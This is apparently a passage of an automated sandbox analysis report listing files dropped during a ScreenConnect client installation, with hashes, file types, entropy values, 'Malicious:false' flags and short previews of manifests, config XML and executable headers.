                                                                                                                        Entropy (8bit):5.089918322084496
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
                                                                                                                        MD5:4E77158D54337B51A6368D7D094397C4
                                                                                                                        SHA1:3A029B30B95786ADF97FB3C0B1C37B11154E0344
                                                                                                                        SHA-256:276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
                                                                                                                        SHA-512:69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):95512
                                                                                                                        Entropy (8bit):6.504684691533346
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                                        MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                                        SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                                        SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                                        SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):548864
                                                                                                                        Entropy (8bit):6.034211651049746
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                                        MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                                        SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                                        SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                                        SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1215
                                                                                                                        Entropy (8bit):5.1306699113418395
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
                                                                                                                        MD5:293C100B1896E7532D241DAC2B32DCB3
                                                                                                                        SHA1:1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
                                                                                                                        SHA-256:AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
                                                                                                                        SHA-512:ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1721856
                                                                                                                        Entropy (8bit):6.639085961200334
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                                        MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                                        SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                                        SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                                        SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1980
                                                                                                                        Entropy (8bit):5.057602063510745
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
                                                                                                                        MD5:88ECD545BDBE3ED49C6A2B87589102EC
                                                                                                                        SHA1:E72949AF66B0A20E50474D2005E320BA63BA9B2B
                                                                                                                        SHA-256:D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
                                                                                                                        SHA-512:7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61208
                                                                                                                        Entropy (8bit):6.310126082367387
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                        MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                        SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                        SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                        SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):602392
                                                                                                                        Entropy (8bit):6.176232491934078
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                        MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                        SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                        SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                        SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2569
                                                                                                                        Entropy (8bit):5.027116382154264
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AQLHMQgAXQ3MQgTMQgRGTDBTo:1YiW4AQ4QRvQ9QY
                                                                                                                        MD5:6A1C3FF3E8F5E23698453B4CCDA2FD12
                                                                                                                        SHA1:C7EED4383B7F1982222E663A0B8850D09B6B20EF
                                                                                                                        SHA-256:8AA9DACC29FAEF7BE40D54B45FBA75AFC13BF25638D9A46DC4B516529AE74619
                                                                                                                        SHA-512:C9F09C968D71F4D7481C1AADBF8337FBCE052F71AA168795DAF374D53CC827BA9E7F1CF9ADC50FC423CF68EE500BFC931DD2E14648626ED7D688F1A41447DCCC
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):17858
                                                                                                                        Entropy (8bit):5.96124399589564
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
                                                                                                                        MD5:7F68A01C2FEA1C80A75E287BB36D6B43
                                                                                                                        SHA1:F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
                                                                                                                        SHA-256:2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
                                                                                                                        SHA-512:C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):81688
                                                                                                                        Entropy (8bit):5.8618809599146005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                                        MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                                        SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                                        SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                                        SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):87
                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                        MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                        SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                        SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                        SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                        Malicious:false
                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                        File Type:JSON data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55
                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                        Malicious:false
                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1590
                                                                                                                        Entropy (8bit):5.363907225770245
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                        MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                        SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                        SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                        SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                        Malicious:false
                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):563
                                                                                                                        Entropy (8bit):5.0293069247766855
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO/SxvSGSbCD0/vXbAa3xT:2dL9hK6E46YP8gGSa6vH
                                                                                                                        MD5:8975A2DB9D3613CA73F282C2EA33956C
                                                                                                                        SHA1:BEAE1D71A6460461543EF10CDCC92669D752B5B6
                                                                                                                        SHA-256:A5048210BA8443ACF1C25CCDEABE57C16E383E5FEF12480B2135A41C846F6653
